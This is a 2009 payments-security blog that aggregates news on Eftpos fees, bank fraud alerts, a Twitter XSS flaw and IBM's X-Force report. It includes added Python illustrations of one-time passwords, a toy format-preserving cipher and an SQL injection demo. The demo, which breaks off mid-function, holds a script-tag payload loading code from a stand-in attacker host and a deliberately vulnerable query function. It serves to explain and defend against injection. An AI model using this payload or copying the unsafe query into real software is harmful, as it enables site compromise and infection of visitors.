Monday, August 31, 2009

Australian Retailers Association Concerned with EftPOS Fees

ARA concerned at RBA review of interchange regulation (Inside Retailing)

Eftpos interchange fees cannot be consistent with debit card fees according to the Australian Retailers Association.

The ARA and the Australian Payment Merchants Forum (AMPF) say they are concerned at a Reserve Bank of Australia proposal to subject Eftpos interchange fees to the same regulation as Visa and MasterCard's debit cards.

Chairman of the AMPF and ARA executive director, Russell Zimmerman, said interchange fees were typically paid by merchants to card issuers to fund the costs of cardholder benefits. But the RBA's suggestion would increase the cost of Eftpos transactions for all Australian retailers.

"Currently, Visa and MasterCard interchange fees are regulated to be an average of 12c per transaction but it's difficult to understand why card issuers should receive 12 cents for each Eftpos transaction.

"Debit cards are a mature product and the cost of processing transactions using Eftpos is minimal. In fact in New Zealand, whose banking market is dominated by the major Australian banks, debit card payments at retailers do not attract any interchange fee.

"Consumers, who use less costly payment instruments, including Eftpos cards, effectively subsidise consumers paying with more costly payment instruments like scheme-branded credit and debit cards. The RBA's latest proposal will price every debit card payment at the highest existing rate," Zimmerman said.

Brazil Suspends VisaNet's Exclusivity Ban

Source: Bloomberg.com

VisaNet Says Brazil Antitrust Agency Suspends Exclusivity Ban

By Laura Price

(Bloomberg) -- Cia. Brasileira de Meios de Pagamento, the credit-card payment processor known as VisaNet, said Brazil’s antitrust regulator suspended a ban on exclusivity imposed by the Justice Ministry.

SDE, as the antitrust arm of the Justice Ministry is known, started a probe against VisaNet, Visa International Service Association and Visa do Brasil Empreendimentos Ltda on Aug. 6. The antitrust unit said VisaNet created exclusivity by requiring businesses to use it to be able to accept cards carrying the Visa logo.

Cade, as the antitrust regulator is known, suspended the preventive measure taken earlier this month by SDE until Cade judges the case for possible anti-competitive practices, VisaNet said in a statement to Brazil’s securities regulator late yesterday. Cade is due to judge the case on Sept. 16, VisaNet said.

Momentum Payment Systems Announces Mobile Payment Processing with New iPhone Application

Merchants of Momentum Payment Systems can now process credit and debit card transactions through its secure network by employing an iPhone, iPod Touch or T-Mobile G1 over Wifi or 3G wireless connections.

Addison, TX (PRWEB) August 31, 2009 -- Momentum Payment Systems, www.MomentumPayments.com, a leader in the electronic payment processing industry, proudly announces the Momentum Payment Systems iPhone Mobile Application.

Small business merchants, independent contractors and mobile merchants now have the ability to utilize Momentum's payment processing solutions without the need for hardware processing equipment or a dedicated internet line.

The application is currently available through Momentum's sales team and is set up via a one-time installation process through a web browser. Upon installation the application icon is available on the home screen of the device for convenient future use.

With the application, merchants can type the card information into the phone and the credit and debit card transactions are processed as "card-not-present" or "offline-debit" payments.

Receipts can currently be emailed to the cardholder however future enhancement plans include the ability for the merchant to print a receipt instantly.

"We've always been dedicated to creating customized payment processing solutions to fit the needs of each business," said Vice President of Operations Robel Sebany. "We've always wanted to provide our merchants with access to a payment processing option as portable as their business and with the growing technological advancements of these mobile devices it is a great opportunity to reach that goal."

About Momentum Payment Systems

Momentum Payment Systems, LLC is a fast growing merchant acquirer that specializes in providing small and medium-sized businesses throughout the United States with comprehensive electronic transaction processing solutions. Momentum distributes and installs point-of-sale equipment and offers traditional credit and debit card processing services as well as processing for ATM cards, gift and loyalty cards, prepaid cards, EBT, checks and e-commerce solutions. Momentum also proudly offers 24 hour technical support.

For further information, please visit Momentum Payment Systems online at www.MomentumPayments.com

The State of CyberCrime - BitPipe.com/TippingPoint

From: BitPipe.com and SearchSecurity.com

The State of Cybercrime: Today's Real Cybercriminals

Sponsored by TippingPoint

Premiered: 28 Aug 2009
Language: English

ABSTRACT:

The Internet is a rough neighborhood. How well is your organization policing your part of the Internet? Online fraud is pervasive and those that are behind online fraud are using sophisticated techniques to target financial and personal information.

This videocast provides an overview of current trends affecting organizations, what enables online fraud, what some of the barriers are, and suggestions for what organizations should do to combat the problem.

Key points of emphasis include:

  • How new threats and emerging trends in online fraud affect many organizations.

  • How to establish an effective Network Neighborhood Watch Program at your company.

  • How policy and globalization issues combat online fraud and steps you can take to protect your organization.

Speaker: Jerry Dixon

Director of Analysis, Team Cymru

Jerry Dixon is currently the director of analysis for Team Cymru; he also serves as InfraGard's vice president for Government Relations. He is the former executive director of the National Cyber Security Division (NCSD) and US-CERT of the Department of Homeland Security.

During his time at Homeland, Dixon led the national effort to protect America's cyber infrastructure and identify cyber threats.

Dixon also served as the deputy director of operations for the U.S. Computer Emergency Readiness Team (US-CERT).

Dixon was instrumental in creating US-CERT, which serves America as the 24x7x365 cyber watch, warning, and incident response center that protects the cyber infrastructure by coordinating defense against and response to cyber attacks. He led the initial development of US-CERT's capabilities for analyzing and reducing cyber threats and vulnerabilities, disseminating cyber threat warning information, and coordinating incident response activities across federal, state, local government agencies, and private sector organizations, making it Homeland Security's primary element of cyber preparedness and response.

Sunday, August 30, 2009

PIN Payments Blog on Zimbio

The PIN Payments News Blog is now also available on Zimbio under the Wikizine:

ePayments News

Or, continue to read the advertisement-free version here at www.HomeATMBlog.com or www.PINDebit.blogspot.com


HomeATM: "Inevitably For Our Own Good"

Here's an excerpt from an article written by Rhodri Marsden which unequivocally states the reality of what it takes to secure online banking and credit/debit card transactions conducted online. It's the economy typing stupid! Don't Type: Swipe!

HomeATM encrypts the card details so that hackers only find "random gobbledygook" and manufactures the "only device" designed for eCommerce to be PCI 2.x Certified. We did it because "it's for your own good." The shift towards everyone using a HomeATM to conduct secure transactions and online banking continues...

There is a worldwide standard (the PCI-DSS) that any companies dealing with cardholder information are obliged to sign up to, but many security experts have pointed out that it's possible to tick all the PCI's boxes and still be insecure. The offence allegedly committed by Gonzalez is as vivid an illustration of that as one can imagine.

For once, this lapse in online security has nothing to do with us, the general public. We're guilty of all manner of stupidity when it comes to our personal financial security – writing down PIN numbers on Post-it notes, using the word "password" as our password (or typing "anything" into online banking sites or merchant checkouts just because we are "instructed to") – but in this case there's nothing we could have done, save for withdrawing entirely from the 21st century and using cash instead.

So what should these companies be doing to protect us? Graham Cluley (sounds like he has one...Clu, that is) from internet security firm Sophos has expressed his disbelief that our card details aren't encrypted when they're stored, so that hackers just find random gobbledygook. "If they were properly encrypted," he says, "it would take until the sun burns out for anyone to decode it."

Editor's Note: HomeATM believes that they shouldn't even be stored. This is why HomeATM instantaneously encrypts the card details (including the Track2 data). By doing so the Internet Retailers (IR) never store it, in fact never even handle it. This provides three distinct benefits: 1. it keeps the data safe, 2. it instantaneously places the IR within the realm of PCI compliance and 3. it protects the IR from significant fines which would be levied against them by V/MC in the event of a breach. Those are three pretty significant benefits...but first, we have to eliminate typing.

But it's not just the companies storing our details that need to shape up. The 130 million stolen credit card numbers would be of no use to anyone if they couldn't be used to buy stuff. Any masterminds wouldn't have been the ones picking a card number and using it to buy soft furnishings on eBay; they'd sell the numbers on to other criminals in blocks of a few thousand. But eventually, someone would pretend to be you and use your money, because it's still disconcertingly easy to do.

Online shopping is a click-happy cinch, but with that convenience comes risk; if you can tap out your 16-digit number, expiry date and a supposed "secret" three-digit number on the back of your card to book a flight to the South of France, so can anyone else.

We may balk at the idea of carrying around an additional device (of the kind Barclays customers now have to use for online banking) to enter our PIN every time we make a credit card purchase online, but when these kinds of measures are inevitably introduced, we'll have to grin and bear it. It's for our own good, after all.

As for the likes of Alberto Gonzalez, they're talented individuals capable of writing sophisticated software that can detect weaknesses in even the strongest computer defences. Indeed, such characters frequently find themselves with job offers in the industry following their release from prison. But after a 35-year stretch, technology is likely to have marched on a bit too far for anyone to catch up. Marched on so far, one would hope, that our money would finally be safe from marauding cybercriminals. Fingers crossed.

Source: Independent

You Say You Want an Evolution?

Evolving Fraud Schemes Keep Pressure on Evolving Payments Instruments

While some of the latest schemes borrow from scams past, today’s fraud schemes are as sophisticated as banks’ most advanced payments systems. And stopping them is still a challenge.

By Maria Bruno-Britz - Bank Tech

Name a payment method and there is probably some scheme to defraud it.

Since the Chinese introduced paper money, banks have been concerned about fraud. More than a thousand years later, payments fraud continues to haunt banks, consumers and businesses.


"Fraud is still rampant," comments Paul Sussman, VP with First Manhattan Consulting in New York. "The majority of businesses over $1 million in revenue are going to be exposed to payment fraud, and almost every bank is being hit by fraud today."

From simple "Dumpster diving" to organized crime rings that rely on complex computer programming, fraud scams grow in sophistication to match the evolution of payment forms. "Fraud trends continue to evolve," notes Douglas Twining, director of fraud services for Cleveland-based KeyBank ($99 billion in assets)....

Saturday, August 29, 2009

FDIC: Online Banking Flawed

Online crime is increasingly hitting small and mid-size companies in the U.S., draining those entities' bank accounts through fraudulent transfers. The problem has gotten so bad that a financial services group recently sent out a warning about the trend, and the Federal Deposit Insurance Corporation (FDIC) issued an alert today.


"In the past six months, financial institutions, security companies, the media and law enforcement agencies are all reporting a significant increase in funds transfer fraud involving the exploitation of valid banking credentials belonging to small and medium sized businesses," says a bulletin sent on Aug. 21 to member financial institutions by the Financial Services Information Sharing and Analysis Center (FS-ISAC). The FS-ISAC is part of the government-private industry umbrella working with the Department of Homeland Security and Treasury Department to share information about critical threats to the country's infrastructure. The member-only alert described the problem and told its members to implement many of the precautions and monitoring currently used to detect consumer bank and credit card fraud.

The FS-ISAC notice -- and subsequent media attention -- in turn prompted the FDIC alert to warn banking institutions about this kind of fraud.

The Threat

The FDIC traces the fraud to compromised login credentials on online banking websites. Over the past year, the FDIC says, it has detected an increase in the number of reports and the amount of losses resulting from unauthorized electronic fund transfers (EFTs), such as automated clearing house (ACH) and wire transfers.

Continue Reading at Bank Info Security

Special Alert from the FDIC: (who I think needs to learn more about our 2FA 3DES DUKPT E2EE PCI 2.x HomeATM)

Special Alerts

SA-147-2009

August 26, 2009

TO: CHIEF EXECUTIVE OFFICER
SUBJECT: Fraudulent Electronic Funds Transfers (EFTs)

Summary: The Federal Deposit Insurance Corporation is aware of an increased number of fraudulent EFT transactions resulting from compromised login credentials.

The Federal Deposit Insurance Corporation (FDIC) is alerting financial institutions that provide Web-based payment origination services for business customers to increased reports of fraudulent EFT transactions resulting from compromised login credentials. Over the past year, the FDIC has detected an increase in the number of reports and the amount of losses resulting from unauthorized EFTs, such as automated clearing house (ACH) and wire transfers. In most of these cases, the fraudulent transfers were made from business customers whose online business banking software credentials were compromised.

Web-based commercial EFT origination applications are being targeted by malicious software, including Trojan horse programs, key loggers and other spoofing techniques, designed to circumvent online authentication methods. Illicitly obtained credentials can be used to initiate fraudulent ACH transactions and wire transfers, and take over commercial accounts.

These types of malicious code, or "crimeware," can infect business customers' computers when the customer is visiting a Web site or opening an e-mail attachment.

Some types of crimeware are difficult to detect because of how they are installed and because they can lie dormant until the targeted online banking session login is initiated. These attacks could result in monetary losses to financial institutions and their business customers if not detected quickly.

Financial institutions and technology service providers can refer to the following guidance for additional information on authentication and information security for high-risk transactions:

  • FFIEC Guidance: Authentication in an Internet Banking Environment

  • Authentication in an Internet Banking Environment: Frequently Asked Questions

  • FFIEC Information Security Examination Handbook (PDF, 866k)

  • FFIEC Retail Payment Systems Examination Handbook

  • FDIC Guidance on Mitigating Risks from Spyware

Consumers who want to learn more about computer security and online scams can find additional information at http://www.fdic.gov/consumers/consumer/guard/index.html and http://www.onguardonline.gov/topics/overview.aspx.

Businesses and local government agencies can find cyber security resources at http://www.us-cert.gov/.

Information about cyber-fraud incidents and other fraudulent activity may be forwarded to the FDIC's Cyber-Fraud and Financial Crimes Section, 550 17th Street, N.W., Room F-4004, Washington, D.C. 20429, or transmitted electronically to alert@fdic.gov. Questions related to federal deposit insurance or consumer issues should be submitted to the FDIC using an online form that can be accessed at http://www2.fdic.gov/starsmail/index.asp.

For your reference, FDIC Special Alerts may be accessed from the FDIC's website at www.fdic.gov/news/news/SpecialAlert/2009/index.html. To learn how to automatically receive FDIC Special Alerts through e-mail, please visit www.fdic.gov/about/subscriptions/index.html.

Online Banking Insecure...Only 1 Bank Rated Excellent

Online Banking's Innate Security Flaws

Consumer rights organization Which? has criticized the online banking systems of some of Britain's biggest lenders, labelling them insecure in a new report released today.

Abbey and Halifax were singled out as particularly poor. Halifax has one of the least secure log-in procedures of the ten online banks we looked at. It asks for three pieces of information to confirm a customer’s identity.

"As each entry is typed in full, this makes the information vulnerable" to a simple keylogger, a virus that sits on a computer and tracks every keystroke with the aim of collecting passwords.

The same two banks, along with HSBC and First Direct, were also found to have no visible security controls for money transfers. Which? Computing also found significant differences in how well money transfers appear to be protected. Abbey, First Direct, Halifax and HSBC have no visible security controls for money transfers, so if a banking session is hijacked, a criminal can enter the amount they want to.

Which? also found that users of Abbey, Alliance & Leicester, HSBC and Halifax are not immediately logged out after a session, leaving them vulnerable if they use online banking on a shared computer.  Alliance & Leicester and HSBC were rated as 'average', while First Direct, Lloyds TSB, Nationwide, NatWest and RBS were given a 'good' rating.

Barclays was the only one of the 10 banks surveyed to get a rating of 'excellent'. The company requires all its online customers to use a "two-factor authentication" (2FA) system involving a PINsentry device which generates a one-time password for each session.

Tony Dyhouse, director of the government-backed Cyber Security Knowledge Transfer Network, said that banks face a difficult challenge in trying to balance security with convenience.

Editor's Note: PINsentry is a great device for 2FA log-in, but keep in mind its ONLY function is as an authenticator. By contrast, HomeATM utilizes 2FA for log-in, but it also enables consumers to conduct financial transactions (including money transfers) in real-time with 100% 2FA 3DES DUKPT End-to-End (Zone 1-5) Encryption.
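The Which? report credits Barclays with a device that produces a one-time password for each session, and the note above points out that such a device only authenticates the login. As an added illustration (not code from the article, from Barclays or from HomeATM) here is the bank-side half of that property: a counter-based one-time password (HOTP, RFC 4226) and a verifier that accepts each code exactly once, so a code captured by the keylogger described earlier on this page is worthless after it has been used. The article does not describe PINsentry's actual algorithm; HOTP, the secret, the user name and the look-ahead window are assumptions made for this demo.

```python
import hashlib
import hmac
import struct

# Added illustration of a counter-based one-time password (HOTP, RFC 4226)
# verified server-side with a small look-ahead window. The secret, user name
# and window size are constructed for the demo; this is not PINsentry's
# algorithm, which the article does not describe.


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (
        (mac[offset] & 0x7F) << 24
        | mac[offset + 1] << 16
        | mac[offset + 2] << 8
        | mac[offset + 3]
    )
    return f"{code % (10 ** digits):0{digits}d}"


class OtpVerifier:
    """Bank-side state: one shared secret and a moving counter per user."""

    def __init__(self, window: int = 5):
        self.window = window            # how far ahead the token may have drifted
        self.secrets: dict[str, bytes] = {}
        self.counters: dict[str, int] = {}

    def enroll(self, user: str, secret: bytes) -> None:
        self.secrets[user] = secret
        self.counters[user] = 0

    def verify(self, user: str, code: str) -> bool:
        """Accept a code once; anything at or below the stored counter is a replay."""
        if user not in self.secrets:
            return False
        start = self.counters[user]
        for c in range(start, start + self.window):
            if hmac.compare_digest(hotp(self.secrets[user], c), code):
                self.counters[user] = c + 1   # burn this counter and every earlier one
                return True
        return False


def demo() -> list[bool]:
    """A login, the same code entered again, a skipped counter, and an old code."""
    secret = b"12345678901234567890"           # constructed demo secret (RFC 4226 test key)
    v = OtpVerifier(window=5)
    v.enroll("alice", secret)
    first = hotp(secret, 0)
    return [
        v.verify("alice", first),              # fresh code: accepted
        v.verify("alice", first),              # captured code entered again: rejected
        v.verify("alice", hotp(secret, 3)),    # token pressed a few extra times: inside the window
        v.verify("alice", hotp(secret, 1)),    # older code: behind the counter, rejected
    ]


if __name__ == "__main__":
    print(demo())
```

The window lets the server tolerate a token that was pressed without a login being completed, while the counter advance guarantees that a code typed once can never be accepted a second time, whatever else is running on the customer's PC.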

Which? would you rather have at your bank?

Friday, August 28, 2009

Debit Gets a Boost

Financially strapped boost payment alternatives

Debit cards are fast becoming the payment instrument of choice for U.S. consumers. According to Visa Inc., the value of purchases made using Visa-branded debit cards in 2008 surpassed dollars spent using Visa credit cards for the first time. For many consumers who have made the switch, there may be no turning back.

Bank Info Security Reviews Financial Institution Breaches

A Review of the Types and Trends of Data Breaches Involving Financial Institutions

August 28, 2009 - Linda McGlasson, Managing Editor

There have been 356 data breaches so far in 2009, according to the Identity Theft Resource Center (ITRC). And 46 of those breaches have involved financial institutions - up from 34 at this same time last year.

In reviewing these 46 incidents (see interactive timeline with details of each breach), one finds good news and bad, according to ITRC executive director Linda Foley.

The good news, Foley says, is that, based on percentages, financial institutions consistently have lower percentages of data breaches than other organizations. "This means they're doing a better job of controlling and protecting their data," she says.

The bad news is when financial institutions -- or their third-party service providers -- are breached ... it's big. Example: the Heartland Payment Systems breach, which resulted in the compromise of 130 million credit and debit cards. Financial data -- bank account numbers, social security numbers, and other personal identifying information -- is invaluable to hackers, and its loss is costly to consumers.

Continue Reading at Bank Info Security

Moneta Raises $4 Million...to Combat PayPal

Atlanta-based startup Moneta raises $4M to combat PayPal

ATLANTA - Moneta, a startup that says it will challenge PayPal for online payment services, has closed on $4 million in venture funding.

The Atlanta Business Chronicle reported the funding on Friday. One of Moneta’s partners is Delta Airlines.

In 2007, Moneta purchased the retail payments product from CheckFree. The system transfers money directly from the buyer’s checking account to participating merchants with lower fees than those required by charge cards.

CheckFree had offered the program for more than two years. Financial terms were not disclosed. The deal includes all customer accounts for the service. CheckFree also will provide Moneta with payment processing services.

Voltage Security Bolts to Record Setting First Half

Voltage Security Finishes Record-Setting First Half Highlighted by Diversified End-to-End Data Protection Solutions

Total contract value of deals in the first half grows by over 70%

Palo Alto, California–August 25, 2009–Voltage Security, Inc., (www.voltage.com), the global leader in end-to-end data protection, today announced another record finish to the first half of their fiscal year ended July 31, 2009. The period ended with the highest revenue quarter in the company’s history, a 35% growth over the same period last year. In addition, the company was cash flow positive from operations and profitable for the quarter. Total contract value of deals in the first half grew by over 70%.

The company also announced a 34% increase in total customer count over the past 12 months to reach more than 780 enterprise customers and more than 3,000,000 total licensed users. During the period, several seven figure deals were closed including the largest in the company’s history.

“Our recent success, especially noteworthy given the tough economic climate, reflects three major benefits of our end-to-end data protection approach: we offer a diverse and complete product set that is well aligned to large enterprise environments, provide products that scale the most cost efficiently, and offer customers the most rapidly deployable solutions in the market,” said Sathvik Krishnamurthy, president and CEO of Voltage Security. “We are finding enterprise customers want a holistic approach for data protection versus a piecemeal or point-to-point approach. Ultimately cost efficiencies are strongest when all of the moving parts are designed to work together.”

Growth Driven by Diversified Product Portfolio

Large enterprise customers are increasingly turning to Voltage to solve their corporate-wide encryption needs which center around securing sensitive and confidential employee and customer data inside applications, databases, emails, files and documents.

Milestones included:

  • One of the world’s largest telecommunications companies, a Fortune 50 company, licensed the entire product suite including Voltage SecureMail™ and Voltage SecureData™ for enterprise-wide deployment, enabling hundreds of thousands of employees and business partners to send and receive secure email, and protecting private customer data in thousands of applications throughout the organization.

  • Heartland Payment Systems, a leading payment processor, selected Voltage Security as a partner to develop end-to-end encryption specifically suited to payments processing. Heartland also licensed Voltage SecureMail™ and Voltage SecureFile™ to protect personal information throughout its corporate and extended business network.

  • Wells Fargo & Company, one of the nation’s largest banks, announced it had selected and deployed Voltage SecureMail™ to secure email between Wells Fargo team members, customers, vendors and extended business partners.

Early Vision Being Realized

Adding to the popularity of Voltage end-to-end data protection solutions is the ease provided by the underlying key management architecture.

“We’ve always understood that the way to make encryption work for large-scale deployments is through simplified key management,” continued Krishnamurthy. “Now, we are seeing our vision reach a tipping point where enterprises have an urgent need to comprehensively protect information, and we offer them a complete family of easy to deploy, scalable, cost-efficient and powerful solutions.”

The flagship Voltage SecureMail™, powered by Voltage Identity-Based Encryption™ (IBE), is consistently selected for the largest enterprise-wide implementations in corporate America with typical deployments in the 50,000 to 500,000 employee range. Voltage SecureData™, by reducing audit scope and ongoing operational cost, is experiencing a rapid increase in demand and quickly establishing itself as the preferred solution for end-to-end encryption and stateless tokenization.

Enterprise Customers Representing a Wide Variety of Industries

A wide variety of enterprise customers are increasingly turning to Voltage to protect information throughout their organizations and beyond. A selection of new customers includes:

  • Fortune 100 global payments and travel company

  • Fortune 100 provider of property and casualty insurance for auto, home and business

  • Fortune 200 global media and entertainment company

  • Fortune 500 provider of financial services to institutional investors

Voltage Standardization Initiatives Continue

Voltage continues to participate in a number of industry standardization initiatives including:

  • NIST (National Institute of Standards and Technology) is reviewing Feistel Finite Set Encryption Mode (FFSEM), designed to encrypt smaller blocks of data in a manner that preserves the format of data – see the Computer Security Division annual report

  • PCI Security Standards Council – Voltage is a participating organization and is a strong advocate of end-to-end encryption and tokenization technologies as effective mechanisms for the reduction of audit scope

  • IEEE – Voltage is involved in developing the P1619.3 key management protocol and the P1363.3 pairing-based public key cryptography standard

  • ASC X9 – Voltage is participating in the F1, F4 and F6 efforts to protect payment data

  • IETF – Voltage-contributed RFCs 5048, 5049 and 509, which cover open standards for Identity-Based Encryption, have now been approved.

  • Most recently, Voltage was one of the few security vendors that participated in the National Cyber Leap Year Summit. This invitation-only event was organized by the White House Office of Science and Technology Policy and the Federal Networking and Information Technology Research and Development Program, and was designed to provide expert advice to the government on the best ways to address today's most pressing cyber-security problems.
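The FFSEM item above describes format-preserving encryption only by its goal: the ciphertext keeps the length and character set of the plaintext, which is what lets an encrypted card number sit in a database column or message field built for a plain one. The following is an added toy illustration of that idea, not FFSEM, FF1 or any Voltage code: a Feistel network over decimal digit strings whose round function is an HMAC reduced to a fixed number of digits, with decryption running the rounds backwards, plus a `protect_pan` helper that leaves the last four digits in the clear for receipts. The key, the card number and the round count are constructed for the demo; a real deployment uses a standardized, analysed mode rather than this sketch.

```python
import hashlib
import hmac

# Added toy illustration of format-preserving encryption for decimal digit
# strings: a Feistel network whose round function is an HMAC reduced to a
# fixed number of digits. It is NOT FFSEM, FF1 or any Voltage product; the
# key and card number used below are constructed for the demo.

ROUNDS = 10   # even, so both halves finish in their starting positions


def _round_function(key: bytes, round_index: int, right: str, width: int) -> int:
    """Pseudo-random function of (round, right half), reduced to `width` decimal digits."""
    digest = hmac.new(key, f"{round_index}:{right}".encode(), hashlib.sha256).digest()
    return int.from_bytes(digest[:8], "big") % (10 ** width)


def _split(digits: str) -> tuple[str, str]:
    half = len(digits) // 2
    return digits[:half], digits[half:]


def _check(digits: str) -> None:
    if not (digits.isascii() and digits.isdigit()) or len(digits) < 2:
        raise ValueError("input must be at least two ASCII decimal digits")


def fpe_encrypt(key: bytes, digits: str) -> str:
    """Encrypt a digit string to another digit string of the same length."""
    _check(digits)
    a, b = _split(digits)
    for i in range(ROUNDS):
        w = len(a)
        # Modular addition keeps the modified half a w-digit string, leading zeros included.
        c = (int(a) + _round_function(key, i, b, w)) % (10 ** w)
        a, b = b, f"{c:0{w}d}"
    return a + b


def fpe_decrypt(key: bytes, digits: str) -> str:
    """Run the rounds backwards, subtracting the same round values."""
    _check(digits)
    a, b = _split(digits)
    for i in reversed(range(ROUNDS)):
        b_prev, c = a, b
        w = len(c)
        a_prev = (int(c) - _round_function(key, i, b_prev, w)) % (10 ** w)
        a, b = f"{a_prev:0{w}d}", b_prev
    return a + b


def protect_pan(key: bytes, pan: str) -> str:
    """Encrypt everything except the last four digits, which receipts still display."""
    _check(pan)
    if len(pan) < 6:
        raise ValueError("PAN too short")
    return fpe_encrypt(key, pan[:-4]) + pan[-4:]


if __name__ == "__main__":
    key = b"constructed-demo-key-not-for-production"
    pan = "4111111111111111"                    # constructed test card number
    ct = fpe_encrypt(key, pan)
    print(pan, "->", ct, "->", fpe_decrypt(key, ct))
    print(protect_pan(key, pan))
```

Because each round only adds a keyed value modulo 10^w to one half, the transform is a bijection on digit strings of that length, and the same input always maps to the same output, which is the property that makes encrypted values usable as lookup keys without the application ever holding the clear PAN.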

About Voltage Security

Voltage Security, Inc., an enterprise security company, is an encryption innovator and global leader in end-to-end data protection. Voltage solutions, based on next generation cryptography, provide end-to-end encryption, tokenization and stateless key management for protecting valuable, regulated and sensitive information based on policy. Voltage products enable reduction in audit scope with rapid implementation and the lowest total cost of ownership in the industry through the use of award-winning cryptographic solutions, including Voltage Identity-Based Encryption™ (IBE) and a new breakthrough innovation: Format-Preserving Encryption™ (FPE). Offerings include Voltage SecureMail™, Voltage SecureData™, Voltage SecureFile™ and the Voltage Security Network™ (VSN), an on-demand managed service for the extended business network.

As a service to the industry and general public, the company maintains the Voltage Data Breach Index and Map which is continuously updated with global data breach information: www.voltage.com/data-breach. The Company has been issued several patents based upon breakthrough research in mathematics and cryptographic systems. Customers include Global 1000 companies in banking, retail, insurance, energy, healthcare and government. To learn more about Voltage customers and sign up for the customer newsletter please visit www.voltage.com/customers.

Attack of the Tweets: Major Twitter Flaw Exposed

U.K. researcher says vulnerability in Twitter API lets an attacker take over a victim's account -- with a tweet

By Kelly Jackson Higgins, Dark Reading

A newly exposed cross-site scripting (XSS) vulnerability in Twitter lets an attacker wrest control of a victim's account merely by sending him or her a tweet.



U.K. researcher James Slater reported the serious flaw earlier this
week, and now says Twitter's fix in response to his disclosure doesn't
actually fix the problem. "It seems they've made a pretty amateurish
attempt to fix the issue, completely missing the massive problem
staring them in the face," Slater said in his blog.




The attack exploits an input validation weakness in one field of the form used to register third-party Twitter clients, such as TweetDeck and Twitterific. The form doesn't fully vet what can go in that box, Slater said, so an attacker can put JavaScript tags there as well as raw HTML code, for instance. Because the client name is shown with every tweet sent through that client, the injected code reaches everyone who views those tweets. "Whatever I type in that box will appear at the end of my tweets," he blogged in a follow-up post. "Anyone who sees that tweet will then be viewing that code."




Continue Reading at Dark Reading













Thursday, August 27, 2009

IBM: Unprecedented State of Web Insecurity - No Such Thing as Safe Browsing




IBM's X-Force Trend and Risk Report has "officially" verified what the HomeATM Blog has been messaging for the last 16 months, which is basically that if you are going to conduct a financial transaction, it must be done outside the browser space...because browsers are unsafe.  You may have seen yesterday's post concerning the Top 11 eCommerce Paradigm Shifters which put HomeATM in Gear.  Combined with today's release of their X-Force Report, you gotta like HomeATM's approach to securing online transactions as we are the only company who does it "outside" the browser space.  (using our simple 2FA 3DES DUKPT E2EE.  :-)






The IBM X-Force Trend and Risk Report is produced twice per year: once at mid-year and once at year-end. Each report provides statistical information about all aspects of threats that affect web security, including software vulnerabilities and public exploitation, malware, spam, phishing, web-based threats, and general cyber criminal activity.

The reports are intended to help customers, fellow researchers, and the public at large understand the changing nature of the threat landscape and what might be done to mitigate it...like swipe vs. type!

The report also reveals what it describes as “an unprecedented state of Web insecurity as Web client, server, and content threats converge to create an untenable risk landscape.”


IBM’s researchers have clocked a 508% increase in the number of new malicious Web links, and the level of veiled Web exploits, especially those carried in PDF files, is now running at an all-time high.

The X-Force report notes an increase in the presence of malicious content on trusted sites, including popular search engines, blogs, bulletin boards, personal Web sites, online magazines and mainstream news sites. PDF vulnerabilities disclosed in the first half of 2009 apparently surpassed disclosures from all of 2008.

“No one is to be trusted,” said X-Force Director Kris Lamb. “There is no such thing as safe browsing. We’ve reached a tipping point where every web site should be viewed as suspicious and every user is at risk.”

Editor's Note:  Sound like a familiar rant? I'm coming from help when I say: "Don't Type...Swipe!"  Want to register to read the report?  Here's the Link (PDF)    Also...here's IBM's Press Release:







ARMONK, N.Y. - 26 Aug 2009:


IBM (NYSE: IBM) today released results from its X-Force 2009 Mid-Year Trend and Risk Report. The report's findings show an unprecedented state of Web insecurity as Web client, server, and content threats converge to create an untenable risk landscape.



According to the report, there has been a 508 percent increase in the number of new malicious Web links discovered in the first half of 2009. This problem is no longer limited to malicious domains or untrusted Web sites. The X-Force report notes an increase in the presence of malicious content on trusted sites, including popular search engines, blogs, bulletin boards, personal Web sites, online magazines and mainstream news sites. The ability to gain access and manipulate data remains the primary consequence of vulnerability exploitations.



The X-Force report also reveals that the level of veiled Web exploits, especially those in PDF files, is at an all-time high, pointing to the increased sophistication of attackers. PDF vulnerabilities disclosed in the first half of 2009 surpassed disclosures from all of 2008. From Q1 to Q2 alone, the amount of suspicious, obfuscated or concealed content monitored by the IBM ISS Managed Security Services team nearly doubled.





"The trends highlighted by the report seem to indicate that the web has finally taken on the characteristics of the Wild West where no one is to be trusted," said X-Force Director Kris Lamb. "There is no such thing as safe browsing today and it is no longer the case that only the red light district sites are responsible for malware. We've reached a tipping point where every Web site should be viewed as suspicious and every user is at risk. The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity."







Web security is no longer just a browser or client-side issue; criminals are leveraging insecure Web applications to target the users of legitimate Web sites. The X-Force report found a significant rise in Web application attacks with the intent to steal and manipulate data and take command and control of infected computers. For example, SQL injection attacks - attacks in which criminals smuggle SQL commands through a Web application's input, in this period typically to write malicious script into a legitimate site's stored content so that its visitors are infected - rose 50 percent from Q4 2008 to Q1 2009 and then nearly doubled from Q1 to Q2.
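The SQL injection pattern the report counts, as an added example that is not IBM's or the report's code. It uses an in-memory SQLite database with constructed sample rows (the `users` and `pages` tables, their columns and the host `attacker.example` are assumptions for the demo). The unsafe functions build queries by string formatting, so one payload dumps every user and another rewrites every page title with a script tag, which is the "infect the visitors" variant described above; the safe functions bind parameters, so the same payloads are stored or compared as plain text.

```python
import sqlite3

# Illustrative attacker value: a tag pointing at an attacker-controlled host
# (attacker.example is a reserved example name, not a real server).
INJECTED_TAG = '<script src="http://attacker.example/m.js"></script>'


def build_db():
    """Fresh in-memory database with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, card_last4 TEXT)")
    conn.executemany("INSERT INTO users (name, card_last4) VALUES (?, ?)",
                     [("alice", "1234"), ("bob", "5678")])
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages (title, body) VALUES (?, ?)",
                     [("Home", "Welcome"), ("News", "Headlines"), ("Contact", "Email us")])
    conn.commit()
    return conn


def lookup_user_unsafe(conn, name):
    """Vulnerable: the caller's input becomes part of the SQL grammar."""
    sql = "SELECT name, card_last4 FROM users WHERE name = '%s'" % name
    return conn.execute(sql).fetchall()


def lookup_user_safe(conn, name):
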